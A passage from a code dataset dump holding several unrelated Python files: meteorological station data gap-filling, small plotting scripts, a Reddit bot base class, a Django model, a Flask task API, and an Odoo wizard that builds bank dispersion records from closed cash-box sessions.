'ELAT':\n da = da.loc['2002-11-25':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ELON':\n da = da.loc['1999-02-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'QEVUZAT-YAVNE':\n da = da.loc['2000-02-05':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ZOMET-HANEGEV':\n da = da.loc['2005-11-21':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'JERUSALEM-CENTRE':\n da = da.loc['1995-11-13':]\n print('{} station is sliced!'.format(da.name)) \n elif da.name == 'NETIV-HALAMED-HE':\n da = da.loc['1995-10-15':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'GAT':\n da = da.loc['2007-10-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'AVNE-ETAN':\n da = da.loc['1993-07-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ROSH-HANIQRA':\n da = da.loc['2007-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'TAVOR-KADOORIE':\n da = da.loc['1995-01-15':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'EN-KARMEL':\n da = da.loc['1993-12-01':]\n print('{} station is sliced!'.format(da.name))\n # if no_row_in_meta:\n # print('{} not exist in meta'.format(da.name))\n da.attrs['station_lat'] = row.lat.values.item()\n da.attrs['station_lon'] = row.lon.values.item()\n da.attrs['station_alt'] = row.alt.values.item()\n if field == 'TD' and not fix_only:\n fill_missing_single_ims_station(da, unique_index=unique_index,\n clim_period=clim, savepath=path,\n verbose=False)\n elif field == 'TD' and fix_only:\n da_list.append(da)\n else:\n da_list.append(da)\n cnt += 1\n if field == 'TD' and not fix_only:\n print('Done filling all stations!')\n files = path_glob(path, '*TD_10mins_filled.nc')\n dsl = [xr.open_dataarray(file) for file in files]\n elif field == 'TD' and fix_only:\n dsl = da_list\n else:\n dsl = da_list\n print('merging all files...')\n ds = xr.merge(dsl)\n if savepath is not None:\n if field == 'TD' and not fix_only:\n filename = 'IMS_TD_israeli_10mins_filled.nc'\n elif field == 'TD' and fix_only:\n filename = 'IMS_{}_israeli_10mins.nc'.format(field)\n else:\n filename = 'IMS_{}_israeli_10mins.nc'.format(field)\n print('saving {} to {}'.format(filename, savepath))\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n ds.to_netcdf(savepath / filename, 'w', encoding=encoding)\n print('Done!')\n return ds\n\n\n#def produce_T_dataset(path=ims_10mins_path, savepath=None, unique_index=True,\n# clim_period='dayofyear'):\n# import xarray as xr\n# from aux_gps import path_glob\n# da_list = []\n# for file_and_path in path_glob(path, '*TD_10mins.nc'):\n# da = xr.open_dataarray(file_and_path)\n# print('post-proccessing temperature data for {} station'.format(da.name))\n# da_list.append(fill_missing_single_ims_station(da, unique_index,\n# clim_period))\n# ds = xr.merge(da_list)\n# if savepath is not None:\n# filename = 'IMS_TD_israeli_10mins_filled.nc'\n# print('saving {} to {}'.format(filename, savepath))\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in ds.data_vars}\n# ds.to_netcdf(savepath / filename, 'w', encoding=encoding)\n# print('Done!')\n# return ds\n\n\ndef fill_missing_single_ims_station(da, unique_index=True,\n clim_period='dayofyear', savepath=None,\n verbose=True):\n \"\"\"fill in the missing time data for the ims station of any variable with\n clim_period is the fine tuning of the data replaced, options are:\n month, weekofyear, dayofyear. return a dataset with original and filled\n dataarray\"\"\"\n # da should be dattaarray and not dataset!\n import pandas as pd\n import numpy as np\n import xarray as xr\n from aux_gps import get_unique_index\n print('filling in missing data for {}'.format(da.name))\n if unique_index:\n ind_diff = da.size - get_unique_index(da).size\n da = get_unique_index(da)\n if verbose:\n print('dropped {} non-unique datetime index.'.format(ind_diff))\n # make sure no coords are in xarray:\n da = da.reset_coords(drop=True)\n # make sure nans are dropped:\n nans_diff = da.size - da.dropna('time').size\n if verbose:\n print('dropped {} nans.'.format(nans_diff))\n da_no_nans = da.dropna('time')\n if clim_period == 'month':\n grpby = 'time.month'\n if verbose:\n print('long term monthly mean data replacment selected')\n elif clim_period == 'weekofyear':\n if verbose:\n print('long term weekly mean data replacment selected')\n grpby = 'time.weekofyear'\n elif clim_period == 'dayofyear':\n if verbose:\n print('long term daily mean data replacment selected')\n grpby = 'time.dayofyear'\n # first compute the climatology and the anomalies:\n if verbose:\n print('computing anomalies:')\n climatology = da_no_nans.groupby(grpby).mean('time')\n anom = da_no_nans.groupby(grpby) - climatology\n # then comupte the diurnal cycle:\n if verbose:\n print('computing diurnal change:')\n diurnal = anom.groupby('time.hour').mean('time')\n # assemble old and new time and comupte the difference:\n if verbose:\n print('assembeling missing data:')\n old_time = pd.to_datetime(da_no_nans.time.values)\n freq = pd.infer_freq(da.time.values)\n new_time = pd.date_range(da_no_nans.time.min().item(),\n da_no_nans.time.max().item(), freq=freq)\n missing_time = pd.to_datetime(\n sorted(\n set(new_time).difference(\n set(old_time))))\n missing_data = np.empty((missing_time.shape))\n if verbose:\n print('proccessing missing data...')\n for i in range(len(missing_data)):\n # replace data as to monthly long term mean and diurnal hour:\n # missing_data[i] = (climatology.sel(month=missing_time[i].month) +\n missing_data[i] = (climatology.sel({clim_period: getattr(missing_time[i],\n clim_period)}) +\n diurnal.sel(hour=missing_time[i].hour))\n series = pd.Series(data=missing_data, index=missing_time)\n series.index.name = 'time'\n mda = series.to_xarray()\n mda.name = da.name\n new_data = xr.concat([mda, da_no_nans], 'time')\n new_data = new_data.sortby('time')\n # copy attrs:\n new_data.attrs = da.attrs\n new_data.attrs['description'] = 'missing data was '\\\n 'replaced by using ' + clim_period \\\n + ' mean and hourly signal.'\n # put new_data and missing data into a dataset:\n dataset = new_data.to_dataset(name=new_data.name)\n dataset[new_data.name + '_original'] = da_no_nans\n if verbose:\n print('done!')\n if savepath is not None:\n da = dataset[new_data.name]\n sid = da.attrs['station_id']\n cname = da.attrs['channel_name']\n name = da.name\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in da.to_dataset(name=name).data_vars}\n filename = '{}_{}_{}_10mins_filled.nc'.format(name, sid, cname)\n if verbose:\n print('saving...')\n da.to_netcdf(savepath / filename, 'w', encoding=encoding)\n print('{} was saved to {}.'.format(filename, savepath))\n return\n return dataset\n\n# # resample to 5min with resample_method: (interpolate is very slow)\n# print('resampling to 5 mins using {}'.format(resample_method))\n# # don't resample the missing data:\n# dataset = dataset.resample(time='5min').ffill()","sub_path":"ims_procedures.py","file_name":"ims_procedures.py","file_ext":"py","file_size_in_byte":63162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"451822568","text":"#! /usr/bin/env python3\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\n\n# Load Iris data set\ndata = load_iris()\nx = data['data']\n\n# Plot the box and whisker\nplt.close('all')\nfig = plt.figure(1)\nax = fig.add_subplot(111)\nax.boxplot(x)\nax.set_xticklabels(data['feature_names'])\nplt.show()\n","sub_path":"ai/srcs/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630291440","text":"import pygal.maps.world\r\nimport json\r\nfrom country_codes import get_country_code\r\nfrom pygal.style import RotateStyle\r\nfrom pygal.style import LightColorizedStyle,RotateStyle\r\n\r\n\r\n\r\nfilename='population_data.json'\r\nwith open(filename) as f:\r\n\tpop_date=json.load(f)\r\n\t\r\ncc_populations={}\r\nfor pop_dict in pop_date:\r\n\tif pop_dict['Year']=='2010':\r\n\t\tcountry=pop_dict['Country Name']\r\n\t\tpopulation=int(float(pop_dict['Value']))\r\n\t\tcode=get_country_code(country)\r\n\t\tif code:\r\n\t\t\tcc_populations[code]=population\r\n\t\t\t\r\n\t\t\t\r\ncc_pops_1,cc_pops_2,cc_pops_3={},{},{}\r\nfor cc,pop,in cc_populations.items():\r\n\tif pop<10000000:\r\n\t\tcc_pops_1[cc]=pop\r\n\telif pop<1000000000:\r\n\t\tcc_pops_2[cc]=pop\r\n\telse:\r\n\t\tcc_pops_3[cc]=pop\r\n\r\nprint(len(cc_pops_1), len(cc_pops_2), len(cc_pops_3))\r\n\t\t\t\r\n#wm_style=RotateStyle('#336699')\r\nwm_style=LightColorizedStyle\r\nwm_style=RotateStyle('#336699',base_style=LightColorizedStyle)\r\nwm=pygal.maps.world.World(style=wm_style)\r\n\r\nwm.title='World Population in 2010, by Country'\r\nwm.add('0-10m',cc_pops_1)\r\nwm.add('10m-1bn',cc_pops_2)\r\nwm.add('>1bn',cc_pops_3)\r\n\r\nwm.render_to_file('world_population_2.svg')","sub_path":"world_population/world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"602431376","text":"from re import sub\nimport logging\nimport praw\nimport time\nfrom bots._helpers import SIGNATURE\n\n\nclass _BaseBot:\n \"\"\"\n Base bot with common methods.\n Gets information about a query from a webpage and then puts it into reddit format\n \"\"\"\n\n def __init__(self, callsign, reply_template):\n self.callsign = callsign\n self.template = reply_template\n\n def _check_message(self, msg):\n \"\"\"\n Uses regexp to check if the bot has been called.\n \"\"\"\n return self.callsign.findall(msg)\n\n def _get_info(self, search_string):\n \"\"\"\n Fetches information from the web about _search_string_\"\"\"\n raise NotImplementedError\n\n def _get_reply_text(self, info, search_string):\n \"\"\"\n Formats reply into reddit friendly message.\n \"\"\"\n if info:\n return self.template.format(**info)\n return \">{} \\n\\nNo results found.\".format(search_string)\n\n def run(self, comment):\n \"\"\"\n Main loop\n \"\"\"\n # limit to three calls per bot.\n search_strings = self._check_message(comment[\"body\"])[:3]\n replies = []\n for search_string in search_strings:\n logging.info(\"Callsign: {} \\n search string: {}\".format(\n self.callsign, search_string))\n info = self._get_info(search_string)\n reply = self._get_reply_text(info, search_string)\n replies.append(reply)\n return replies\n","sub_path":"bots/_BaseBot.py","file_name":"_BaseBot.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"4706404","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nimport uuid\n\n\nclass Notification(models.Model):\n \"\"\"\n Model which represents a Notification.\n \"\"\"\n\n id = models.UUIDField(\n verbose_name=_('Notification ID'),\n primary_key=True,\n default=uuid.uuid1,\n help_text=_('An ID which represents a specific Notification.'),\n editable=False,\n )\n\n date_created = models.DateTimeField(\n verbose_name=_('Date Created'),\n help_text=_('When the notification was created.'),\n auto_now_add=True,\n editable=False,\n )\n\n description = models.CharField(\n verbose_name=_('Description'),\n help_text=_('The description of the notification.'),\n max_length=1000,\n )\n\n mac_address = models.CharField(\n verbose_name=_('MAC Address'),\n help_text=_('The MAC Address of the device on the network.'),\n max_length=17,\n )\n\n def __str__(self):\n return 'MAC: {}, Description: {}'.format(self.mac_address, self.description)\n","sub_path":"mysite/notifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"600069621","text":"\"\"\"pyanno package setup definition\"\"\"\n\nfrom setuptools import setup, find_packages\n\n# ---- add ETS recipes for py2app\n\nimport types\nimport py2app.recipes\n\ndef ets_check(cmd, mf):\n m = mf.findNode('pyface')\n if m is None or m.filename is None:\n return None\n return dict(\n packages = ['pyface','enable','kiva','traits','wx','traitsui','chaco']\n )\n\npy2app.recipes.ets = types.ModuleType('py2app.recipes.ets')\npy2app.recipes.ets.check = ets_check\n\n\n# ---- /add ETS recipes for py2app\n\n\nfrom setup import setup_dict\n\nAPP = ['pyanno/ui/main.py']\nOPTIONS = {'argv_emulation': True, 'packages': 'pyanno'}\n\nsetup_py2app_dict = dict(\n app=APP,\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n\nsetup_py2app_dict.update(setup_dict)\n\nif __name__ == '__main__':\n setup(**setup_py2app_dict)\n","sub_path":"setup_py2app.py","file_name":"setup_py2app.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"168922362","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, jsonify, request, abort\n\napp = Flask(__name__)\n\ntasks = []\n\n\n@app.route('/api/v1.0/tasks/', methods=['PUT', 'POST'])\ndef post_tasks(task_id):\n if not request.json:\n abort(404)\n task = {\n 'task_id': task_id,\n 'task_name': request.json.get('task_name', '')\n }\n tasks.append(task)\n return jsonify({'tasks': task})\n\n\n@app.route('/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@app.route('/api/v1.0/tasks', methods=['DELETE'])\ndef delete_tasks():\n tasks[:] = []\n return jsonify({'tasks': tasks})\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', debug=True)\n","sub_path":"lib/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522915304","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError,ValidationError\nfrom odoo.tools.translate import _\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass cls_wizarddispersion(models.TransientModel):\n _name = 'dispersionbancaria.wizard'\n\n fechaapertura = fields.Date(track_visibility='onchange',string=\"Fecha de apertura\",default=fields.Date.today(),required=True)\n agrupacioncaja_id=fields.Many2one(\"cb.typebox\",string=\"Agrupacion caja\",track_visibility='onchange',required=True)\n\n def _default_message(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where state='closed' and coalesce(incluidodispersion,'f') <> 't'\n and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n\n\n if recepciones_obj: \n message=\"[Dispersiones Pendientes del dia: (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"\"\n\n return message\n\n def _default_messagecajas(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where (state = 'opened') and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n \n if recepciones_obj: \n message=\"[Caja(s) abierta(s): (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"Todas la cajas estan cerradas\"\n\n return message\n\n\n def _default_messagerecepcion(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where (state = 'closing_control') and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n \n if recepciones_obj: \n message=\"[Pendiente(s) de Recepcion faltantes por procesar: (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"Todas las recepciones están procesadas\"\n\n return message\n\n def _default_pendientes(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n from cb_session \n where state='closed' and coalesce(incluidodispersion,'f') <> 't'\n and start_at is not null\n group by cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n order by cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n '''% ())\n recepciones_obj=self.env.cr.fetchall()\n \n if recepciones_obj: \n pendientes=True\n else:\n pendientes=False\n\n return pendientes\n\n message = fields.Char(string=\"Message\",default=_default_message)\n pendientes = fields.Boolean(\"Pendientes\",default=_default_pendientes,Traslate=True,track_visibility='onchange')\n messagecajas = fields.Char(string=\"Message\",default=_default_messagecajas)\n messagerecepciones = fields.Char(string=\"Message\",default=_default_messagerecepcion)\n\n\n @api.multi\n def genera_dispersion(self): \n #Se declaran los parametros por los cuales se hara la busqueda\n fecha=self.fechaapertura\n agrupacion=self.agrupacioncaja_id.id\n #Consulta para buscar las recepciones pendientes por procesar de fecha anterior a la que se quiere procesar actualmente\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) <'%s' and boxtype_id='%s' and state='closed' and coalesce(incluidodispersion,'f') <> 't' and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen pendientes de recepciones por procesar inferiores a esta fecha')\n\n #Consulta para buscar las recepciones pendientes por procesar de fecha de apertura establecido\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) ='%s' and boxtype_id='%s' and state='closing_control' and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen pendientes de recepciones por procesar')\n\n #Consulta para buscar las recepciones pendientes por procesar de fecha de apertura establecido\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) ='%s' and boxtype_id='%s' and state='opened' and start_at is not null and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen cajas abiertas')\n \n\n #Consulta para buscar las recepciones correspondientes\n self.env.cr.execute('''\n select id idrecepcion\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)='%s' and boxtype_id='%s' and coalesce(incluidodispersion,'f') <> 't' and state='closed' and start_at is not null\n '''% (fecha,agrupacion))\n recepciones_obj=self.env.cr.fetchall()\n if recepciones_obj:\n #Inicio Crea cabecera para la dispersion\n print('dispersion automatica')\n _logger.warning('dispersion automatica')\n datosdispersion={}\n datosdispersion={\n 'fechaapertura':fecha,\n 'agrupacioncaja_id':agrupacion,\n 'fecha':fields.Date.today(),\n }\n dispersion=self.env['dispersionbancaria'].create(datosdispersion)\n _logger.warning('Inicio Importe Efectivo')\n _logger.warning('Fin importe_general_efectivo')\n efectivo=self.importe_general_efectivo(fecha,agrupacion)\n print('Fin Importe Efectivo')\n importetransacciones=efectivo['importetransacciones']\n importereal=efectivo['importereal']\n if importereal>importetransacciones:\n importereal=importetransacciones\n importeconsumido=0\n efectivo_obj=self.env['account.journal'].search([('id','=',efectivo['metodopago'])])\n else:\n raise ValidationError('No se encontaron recepciones para dispersar')\n\n\n #diccionario=[]\n for res in recepciones_obj:\n recepcion=self.env['cb.session'].search([('id','=',res[0])])\n _logger.warning('recepcion: '+str(recepcion.name))\n recepcion.write({'incluidodispersion':True})\n\n _logger.warning('Inicio Crea relacion Dispersion - Session')\n datosdispersionrecepcion={}\n datosdispersionrecepcion={\n 'dispersion_id':dispersion.id,\n 'recepcion_id':recepcion.id,\n }\n self.env['dispersionrecepcion'].create(datosdispersionrecepcion)\n _logger.warning('Fin Crea relacion Dispersion - Session') \n for cobro in recepcion.order_ids:\n cad = cobro.cadena_validacion\n if cad.find(\"$0 \") == -1: \n _logger.warning('Inicio Recorre Cobro') \n _logger.warning(cobro.pos_reference)\n reqtransferencia=False\n\n #INICIO- Se busca que el cobro tenga conceptos con cuenta destino \n _logger.warning('valida_cobroctadestino')\n cobroctadestino=self.valida_cobroctadestino(cobro)\n #FIN- Se busca que el cobro tenga conceptos con cuenta destino\n\n #Se valida que el cobro tenga cuenta destino sino se procede a generar los registros tomando la cuenta destino del metodo de pago\n if cobroctadestino:\n #|||||||||||||||||||TRANSFERENCIA|||||||||||||||||||||\n #Aqui se trabajaran los cobros que contengan cobros con cta. destino\n _logger.warning('Cobro con conceptos de cta. destino')\n #INICIO Se busca que la suma de los conceptos que tengan cta.destino\n _logger.warning('importe_cobroctadestino')\n importectadestino=self.importe_cobroctadestino(cobro)\n #FIN Se busca que la suma de los conceptos que tengan cta.destino\n #INICIO Se descuenta el importe de conceptos de cuentas destino para posteriormente validar si se alcansa a cubrir dichos valores\n\n #if cobro.name=='1/0343':\n # raise ValidationError(importectadestino)\n _logger.warning('importe_noreqtransferencia')\n importemetodo=self.importe_noreqtransferencia(cobro,recepcion,importectadestino,importereal)\n\n if importemetodo:\n _logger.warning('Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n _logger.warning('Ajusto el Efectivo')\n #print('Importe efectivo - '+str(importereal))\n #print('Importe a Descontar - '+str(importectadestino))\n importereal=importereal-importectadestino\n importeconsumido=importeconsumido+importectadestino\n #print('Neto: - '+str(importereal))\n _logger.warning('detalles_dispersionconceptoctadestino')\n self.detalles_dispersionconceptoctadestino(cobro,dispersion,recepcion,efectivo_obj) \n else:\n _logger.warning('NO Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n self.detalles_atransferirconceptoctadestino(cobro,dispersion,recepcion) \n if 1==2:\n if importereal >=importectadestino:\n _logger.warning('Ajusto+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n _logger.warning('Ajusto el Efectivo')\n #print('Importe efectivo - '+str(importereal))\n #print('Importe a Descontar - '+str(importectadestino))\n importereal=importereal-importectadestino\n importeconsumido=importeconsumido+importectadestino\n #print('Neto: - '+str(importereal))\n self.detalles_dispersionconceptoctadestino(cobro,dispersion,recepcion,efectivo_obj)\n #FIN Se descuenta el importe de conceptos de cuentas destino para posteriormente validar si se alcansa a cubrir dichos valores\n else:\n _logger.warning('NO Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n #Se hacen los registros a transferir cuando no alcance el efectivo \n self.detalles_atransferirconceptoctadestino(cobro,dispersion,recepcion)\n #|||||||||||||||||||TRANSFERENCIA|||||||||||||||||||||\n else:\n #raise ValidationError('aqui 2')\n #|||||||||||||||||||DISPERSION|||||||||||||||||||||\n #Aqui se trabajaran los cobros queno contengan cobros con cta. destino\n _logger.warning('Cobro sin conceptos de cta. destino')\n for metodospago in cobro.statement_ids:\n #Se valida que el metodo de pago requiera transferenia y si si se hacen los registros en los detalles de la dispersion,ya que de los que no requieren ya se tiene contempladosvy esto es para no repetir importes\n if metodospago.journal_id.transfer_required: \n #Se busca la cuenta destino\n _logger.warning('busca_ctadestino')\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n #print (metodospago.journal_id.name+' '+str(metodospago.amount))\n #Se valida si el tipo de pagp acepta la agrupacion \n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('requiere tranferencia')\n else:\n _logger.warning('no requiere tranferencia')\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)])\n importeori=metodospago.amount\n importe=metodospago.amount\n importeajustepositivo=0\n importeajustenegativo=0\n if itemajuste:\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=metodospago.amount+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=metodospago.amount-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion cobro normal')\n self.crea_itemsdispersion(metodospago.amount,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n else:\n _logger.warning('actualiza_itemsdispersion cobro normal')\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n else:\n _logger.warning('La salta por ser igual a 0')\n _logger.warning(cobro.pos_reference)\n #|||||||||||||||||||DISPERSION|||||||||||||||||||||\n \n itemsajustes=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('incluidodispersion','=',False)])\n\n for itemajuste in itemsajustes:\n #raise ValidationError('encontro ajuste')\n cuentadestino=itemajuste.metodo.destination_account_id\n importeajustepositivo=0\n importeajustenegativo=0\n importe=0\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=importe+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=importe-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n _logger.warning('crea_ajustes')\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',itemajuste.metodo.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',itemajuste.concat)])\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion ajuste')\n self.crea_itemsdispersion(itemajuste.importe,itemajuste.metodo.id,itemajuste.metodo.id,0,importe,cuentadestino.id,cuentadestino.bank_id.id,False,dispersion.id,itemajuste.concat,importeajustepositivo,importeajustenegativo,False,True)\n else:\n _logger.warning('actualiza_itemsdispersion ajuste')\n self.actualiza_itemsdispersion(itemdispersion,0,importe,False,importeajustepositivo,importeajustenegativo)\n \n #En caso que todavia se tenga efectivo se hace el registro en la dispersion con ese faltante\n restante=importetransacciones-importeconsumido\n if restante > 0:\n tipovalor_obj=self.env['account.journal'].search([('id','=',efectivo_obj.id)])\n reqtransferencia=False\n if tipovalor_obj:\n for atransferir in dispersion.atransferir_ids:\n if not reqtransferencia:\n if atransferir.tipovalor_id.id==tipovalor_obj.id:\n _logger.warning('se encontro el efectivo en atransferir')\n reqtransferencia=True\n else:\n _logger.warning('ya se habia encontrado el efectivo en atransferir')\n importeori=restante\n importe=restante\n cuentadestino=efectivo_obj.destination_account_id\n datoscomple=''\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',tipovalor_obj.id),('destino_id','=',cuentadestino.id),('efectivoglobal','=',True)])\n\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion efectivo faltante')\n self.crea_itemsdispersion(importe,tipovalor_obj.id,tipovalor_obj.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,True)\n else:\n _logger.warning('actualiza_itemsdispersion efectivo faltante')\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,0,0)\n\n\n _logger.warning('||||||||inicio reasignacion de registros a transferir||||||||||||')\n _logger.warning('reasignacion_atransferir')\n self.reasignacion_atransferir(dispersion,efectivo_obj)\n _logger.warning('||||||||fin reasignacion de registros a transferir||||||||||||')\n\n\n dispersion.genera_folio() \n return {'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': dispersion.id,\n 'res_model': 'dispersionbancaria',\n }\n\n\n @api.multi\n def reasignacion_atransferir(self,dispersion,efectivo_obj):\n\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('efectivoglobal','=',True)])\n\n #comentamos ya que el efectivo no lo tenemos disponible\n '''\n if itemdispersion:\n #se le da prioridad al efectivo \n _logger.warning('Inicio recorrido a transferir efectivo')\n for itematransferirefectivo in dispersion.atransferir_ids:\n if efectivo_obj.id==itematransferirefectivo.tipovalor_id.id:\n _logger.warning('efectivo - reasignacion de registros 